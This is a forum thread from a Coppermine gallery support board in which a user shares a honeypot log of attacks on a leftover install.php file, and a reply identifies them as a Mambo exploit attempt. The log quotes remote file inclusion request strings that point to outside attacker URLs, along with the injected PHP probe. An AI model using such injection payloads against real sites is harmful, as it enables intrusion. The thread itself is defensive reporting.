Attack to CPG 1.4.x target "install.php" Attack to CPG 1.4.x target "install.php"
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

Attack to CPG 1.4.x target "install.php"

Started by brix, August 27, 2010, 10:45:57 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

brix

Hi all,

I know that after installation you must delete "install.php" for any CMS but often that does not happen.

One of our users (an Italian website) has recently been attacks on the file "install.php" so I suggested to remove it.

He did and one of his staff created a false "install.php" bait running log of attempts to hack.

I hope it will be useful to know which attack is executed, and for that reason I Paste the contents of the log created bait:
Quote
Log:

Sunday 15th of August 2010 09:09:59 AM - 146.83.237.120 - Mozilla/5.0 - mosConfig_absolute_path=http://www.songdosarang.org/skin/head??
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error=http://devilbat.fileave.com/zfxid1.txt?

Comment:

Caught!
It seems that finally the fish has the bait!
On the day of August there were a couple of intrusion attempts, the result is these two lines:
Sunday 15th of August 2010 9:09:59 AM - 146.83.237.120 - Mozilla/5.0 - http://www.songdosarang.org/skin/head mosConfig_absolute_path =?
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error = http://devilbat.fileave.com/zfxid1.txt?

The first IP is from Chile, the university network and the second by a U.S. hosting service, probably in both cases it is a botnet and the owners of IP are unaware and innocent.

Both attacks link to a URL in the parameters passed to the installer of Coppermine by visiting the url you get (as expected) the string php who wanted to inject this site:
<? Php / * * ZFxID / echo ("Shiro". "Hige") die ("Shiro". "Hige") / * * ZFxID /?>

If this thread is somewhat useful, I was pleased to collaborate in the protection of Coppermine, with the help of our users. Thanks

brix

sorry I pushed the button "solved" but is not :-(

Nibbler

That's a mambo exploit attempt. It won't do anything to Coppermine.